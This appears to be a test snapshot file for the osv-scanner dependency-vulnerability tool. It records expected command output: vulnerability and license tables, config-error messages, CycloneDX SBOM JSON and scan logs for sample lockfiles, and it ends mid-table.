with 0BSD overriding license for package Packagist/league/flysystem/1.0.8 with 0BSD overriding license for package Packagist/sentry/sdk/2.0.4 with 0BSD overriding license for package Packagist/theseer/tokenizer/1.1.3 with 0BSD Total 6 packages affected by 10 known vulnerabilities (2 Critical, 2 High, 2 Medium, 3 Low, 1 Unknown) from 4 ecosystems. 6 vulnerabilities can be fixed. +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+--------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+--------------------------------------------------+ | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-insecure/composer.lock | | https://osv.dev/DRUPAL-CORE-2025-005 | 2.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-83v7-c2cf-p9c2 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-006 | 5.9 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-m6vv-vcj8-w8m7 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-007 | 2.1 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-h89p-5896-f4q8 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-008 | 3.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-mhpg-hpj5-73r2 | | | | | | | | https://osv.dev/DRUPAL-CONTRIB-2025-083 | | Packagist | drupal/simple_sitemap | 4.2.1 | -- | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-many-with-insecure/composer.lock | | 
https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.13-r0 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.13-r0 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+--------------------------------------------------+ +---------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +---------+-------------------------+ | MIT | 15 | | 0BSD | 7 | | UNKNOWN | 5 | +---------+-------------------------+ +-------------------+-----------+------------------------------------------------+--------------+-------------------------------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+------------------------------------------------+--------------+-------------------------------------------------------+ | 0BSD | Packagist | league/flysystem | 1.0.8 | testdata/locks-insecure/composer.lock | | UNKNOWN | Go | stdlib | 1.99.9 | testdata/locks-insecure/osv-scanner-custom.json | | UNKNOWN | Go | toolchain | 1.99.9 | testdata/locks-insecure/osv-scanner-custom.json | | UNKNOWN | | https://chromium.googlesource.com/chromium/src | | testdata/locks-insecure/osv-scanner-flutter-deps.json | | UNKNOWN | | https://github.com/brendan-duncan/archive.git | | testdata/locks-insecure/osv-scanner-flutter-deps.json | | UNKNOWN | | https://github.com/flutter/buildroot.git | | testdata/locks-insecure/osv-scanner-flutter-deps.json | | 0BSD | Packagist | drupal/core | 10.4.5 | testdata/locks-many-with-insecure/composer.lock | | 0BSD | Packagist | drupal/simple_sitemap | 4.2.1 | testdata/locks-many-with-insecure/composer.lock | | 0BSD | Packagist | drupal/tfa | 2.0.0-alpha4 | 
testdata/locks-many-with-insecure/composer.lock | | 0BSD | Packagist | league/flysystem | 1.0.8 | testdata/locks-many-with-insecure/composer.lock | | 0BSD | Packagist | sentry/sdk | 2.0.4 | testdata/locks-many-with-insecure/composer.lock | | 0BSD | Packagist | theseer/tokenizer | 1.1.3 | testdata/locks-many-with-insecure/composer.lock | +-------------------+-----------+------------------------------------------------+--------------+-------------------------------------------------------+ --- [TestCommand/config_file_can_be_broad - 2] --- [TestCommand/config_file_is_invalid - 1] Scanning dir ./testdata/config-invalid Scanned /testdata/config-invalid/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestCommand/config_file_is_invalid - 2] Ignored invalid config file at /testdata/config-invalid/osv-scanner-test.toml because: toml: line 1: expected '.' or '=', but got '!' instead --- [TestCommand/config_files_cannot_have_unknown_keys - 1] --- [TestCommand/config_files_cannot_have_unknown_keys - 2] Failed to read config file: unknown keys in config file: RustVersionOverride, PackageOverrides.skip, PackageOverrides.license.skip unknown keys in config file: RustVersionOverride, PackageOverrides.skip, PackageOverrides.license.skip --- [TestCommand/config_files_should_not_have_multiple_ignores_with_the_same_id - 1] warning: ./testdata/osv-scanner-duplicate-config.toml has multiple ignores for GO-2022-0274 - only the first will be used! 
Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. ./testdata/osv-scanner-duplicate-config.toml has unused ignores: - GO-2022-0274 - GO-2022-0274 - GHSA-whgm-jr23-g3j9 - CVE-2025-26519 No issues found --- [TestCommand/config_files_should_not_have_multiple_ignores_with_the_same_id - 2] --- [TestCommand/cyclonedx_1.4_output - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:composer/league/flysystem@1.0.8", "type": "library", "name": "league/flysystem", "version": "1.0.8", "licenses": [], "purl": "pkg:composer/league/flysystem@1.0.8" }, { "bom-ref": "pkg:golang/stdlib@1.99.9", "type": "library", "name": "stdlib", "version": "1.99.9", "licenses": [], "purl": "pkg:golang/stdlib@1.99.9" }, { "bom-ref": "pkg:golang/toolchain@1.99.9", "type": "library", "name": "toolchain", "version": "1.99.9", "licenses": [], "purl": "pkg:golang/toolchain@1.99.9" }, { "bom-ref": "pkg:npm/has-flag@4.0.0", "type": "library", "name": "has-flag", "version": "4.0.0", "licenses": [], "purl": "pkg:npm/has-flag@4.0.0" }, { "bom-ref": "pkg:npm/wrappy@1.0.2", "type": "library", "name": "wrappy", "version": "1.0.2", "licenses": [], "purl": "pkg:npm/wrappy@1.0.2" } ], "vulnerabilities": [ { "id": "GHSA-9f46-5r25-5wfm", "references": [ { "id": "CVE-2021-32708", "source": {} } ], "ratings": [ { "method": "CVSSv3", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "description": "Time-of-check Time-of-use (TOCTOU) Race Condition in league/flysystem", "detail": "### 
Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions: \n\n- A user is allowed to supply the path or filename of an uploaded file.\n- The supplied path or filename is not checked against unicode chars.\n- The supplied pathname checked against an extension deny-list, not an allow-list.\n- The supplied path or filename contains a unicode whitespace char in the extension.\n- The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.\n\n### Patches\n\nThe unicode whitespace removal has been replaced with a rejection (exception).\n\nThe library has been patched in:\n- 1.x: https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32\n- 2.x: https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74\n\n### Workarounds\n\nFor 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.\n", "advisories": [ { "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32708" } ], "published": "2021-06-29T03:13:28Z", "updated": "2026-03-13T22:01:08Z", "credits": { "organizations": [] }, "affects": [ { "ref": "pkg:composer/league/flysystem" } ] } ] } --- [TestCommand/cyclonedx_1.4_output - 2] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
--- [TestCommand/cyclonedx_1.5_output - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/league/flysystem@1.0.8", "type": "library", "name": "league/flysystem", "version": "1.0.8", "licenses": [], "purl": "pkg:composer/league/flysystem@1.0.8" }, { "bom-ref": "pkg:golang/stdlib@1.99.9", "type": "library", "name": "stdlib", "version": "1.99.9", "licenses": [], "purl": "pkg:golang/stdlib@1.99.9" }, { "bom-ref": "pkg:golang/toolchain@1.99.9", "type": "library", "name": "toolchain", "version": "1.99.9", "licenses": [], "purl": "pkg:golang/toolchain@1.99.9" }, { "bom-ref": "pkg:npm/has-flag@4.0.0", "type": "library", "name": "has-flag", "version": "4.0.0", "licenses": [], "purl": "pkg:npm/has-flag@4.0.0" }, { "bom-ref": "pkg:npm/wrappy@1.0.2", "type": "library", "name": "wrappy", "version": "1.0.2", "licenses": [], "purl": "pkg:npm/wrappy@1.0.2" } ], "vulnerabilities": [ { "id": "GHSA-9f46-5r25-5wfm", "references": [ { "id": "CVE-2021-32708", "source": {} } ], "ratings": [ { "method": "CVSSv3", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "description": "Time-of-check Time-of-use (TOCTOU) Race Condition in league/flysystem", "detail": "### Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. 
Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions: \n\n- A user is allowed to supply the path or filename of an uploaded file.\n- The supplied path or filename is not checked against unicode chars.\n- The supplied pathname checked against an extension deny-list, not an allow-list.\n- The supplied path or filename contains a unicode whitespace char in the extension.\n- The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.\n\n### Patches\n\nThe unicode whitespace removal has been replaced with a rejection (exception).\n\nThe library has been patched in:\n- 1.x: https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32\n- 2.x: https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74\n\n### Workarounds\n\nFor 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.\n", "advisories": [ { "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32708" } ], "published": "2021-06-29T03:13:28Z", "updated": "2026-03-13T22:01:08Z", "credits": { "organizations": [] }, "affects": [ { "ref": "pkg:composer/league/flysystem" } ] } ] } --- [TestCommand/cyclonedx_1.5_output - 2] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
--- [TestCommand/exclude_with_exact_directory_name - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/exclude_with_exact_directory_name - 2] --- [TestCommand/exclude_with_glob_pattern - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/exclude_with_glob_pattern - 2] --- [TestCommand/exclude_with_invalid_regex_returns_error - 1] Scanning dir ./testdata/locks-many --- [TestCommand/exclude_with_invalid_regex_returns_error - 2] failed to parse exclude patterns: invalid regex pattern "[invalid": error parsing regexp: missing closing ]: `[invalid` --- [TestCommand/exclude_with_multiple_exact_directories - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
No issues found --- [TestCommand/exclude_with_multiple_exact_directories - 2] --- [TestCommand/exclude_with_multiple_pattern_types - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/exclude_with_multiple_pattern_types - 2] --- [TestCommand/exclude_with_regex_pattern - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/exclude_with_regex_pattern - 2] --- [TestCommand/folder_of_supported_sbom_with_only_unimportant - 1] Scanning dir ./testdata/sbom-insecure/only-unimportant.spdx.json Scanned /testdata/sbom-insecure/only-unimportant.spdx.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestCommand/folder_of_supported_sbom_with_only_unimportant - 2] --- [TestCommand/folder_of_supported_sbom_with_only_unimportant#01 - 1] Scanning dir ./testdata/sbom-insecure/only-unimportant.spdx.json Scanned /testdata/sbom-insecure/only-unimportant.spdx.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------+------+-----------+---------+--------------------+---------------+---------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+--------------------+---------------+---------------------------------------------------+ | Unimportant vulnerabilities | | | | | | | +---------------------------------------+------+-----------+---------+--------------------+---------------+---------------------------------------------------+ | https://osv.dev/UBUNTU-CVE-2017-11164 | 7.5 | Ubuntu | pcre3 | 2:8.39-12ubuntu0.1 | -- | testdata/sbom-insecure/only-unimportant.spdx.json | +---------------------------------------+------+-----------+---------+--------------------+---------------+---------------------------------------------------+ --- [TestCommand/folder_of_supported_sbom_with_only_unimportant#01 - 2] --- [TestCommand/folder_of_supported_sbom_with_vulns - 1] Scanning dir ./testdata/sbom-insecure/ Scanned /testdata/sbom-insecure/alpine-zlib-16.cdx.json file and found 1 package Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/sbom-insecure/bad-purls.cdx.xml file and found 15 packages Scanned /testdata/sbom-insecure/only-unimportant.spdx.json file and found 1 package Scanned /testdata/sbom-insecure/postgres-stretch.cdx.xml file and found 136 packages Scanned /testdata/sbom-insecure/with-duplicates.cdx.xml file and found 17 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 10 local/unscannable package/s from the scan. 
Total 26 packages affected by 181 known vulnerabilities (21 Critical, 77 High, 56 Medium, 3 Low, 24 Unknown) from 4 ecosystems. 11 vulnerabilities can be fixed. +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ | https://osv.dev/GO-2022-0274 | 6.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.0 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-v95c-p5hm-xq8f | | | | | | | | https://osv.dev/GO-2022-0452 | 5.9 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.2 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-f3fp-gc8g-vw66 | | | | | | | | https://osv.dev/GO-2023-1627 | 7.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-vpvm-3wq2-2wvm | | | | | | | | https://osv.dev/GO-2023-1682 | 2.5 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-m8cg-xc2p-r3fc | | | | | | | | https://osv.dev/GO-2023-1683 | 6.1 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-g2j6-57v7-gm8c | | | | | | | | https://osv.dev/GO-2024-2491 | 8.6 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.12 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-xr7r-f8xq-vfvv | | | | | | | | https://osv.dev/GO-2024-3110 | 4.8 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.14 | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-jfvp-7x6p-h2pv | | | | | | | | https://osv.dev/GO-2025-4096 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-9493-h29p-rfm2 | | | | | | | | https://osv.dev/GO-2025-4097 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-qw9x-cqr3-wc7r | | | | | | | | https://osv.dev/GO-2025-4098 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-cgrx-mc8f-2prm | | | | | | | | https://osv.dev/GO-2022-0493 | 5.3 | Go | golang.org/x/sys | v0.0.0-20210817142637-7d9622a276b7 | 0.0.0-20220412211240-33da011f77ad | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-p782-xgp4-8hr8 | | | | | | | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | 
https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/DSA-4685-1 | 5.5 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4808-1 | 5.7 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0501 | 5.9 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-3462 | 8.1 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3715 | 7.8 | Debian | bash | 4.4-5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2781 | 6.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0684 | 5.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3482-1 | | Debian | debian-archive-keyring | 2017.5+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5147-1 | 9.8 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-6297 | 8.2 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2219 | 7.5 | Debian | dpkg | 1.18.25 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4535-1 | 7.5 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-5188 | 6.7 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-1304 | 7.8 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3910-1 | | | | | | | | https://osv.dev/DSA-5122-1 | 8.8 | Debian | gzip | 1.6-5+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0379 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7526 | 6.8 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0495 | 4.7 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-13627 | 6.3 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-33560 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-40528 | 5.9 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5863-1 | 5.3 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-10790 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6003 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-46848 | 9.1 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3263-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2025-13151 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5142-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5271-1 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5391-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5990-1 | | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-3709 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2309 | | | | | | | | https://osv.dev/DLA-3878-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2016-9318 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0663 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-15412 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16931 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16932 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-18258 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5130 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5969 | 4.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7375 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7376 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-8872 | 9.1 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9047 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9048 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9049 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | 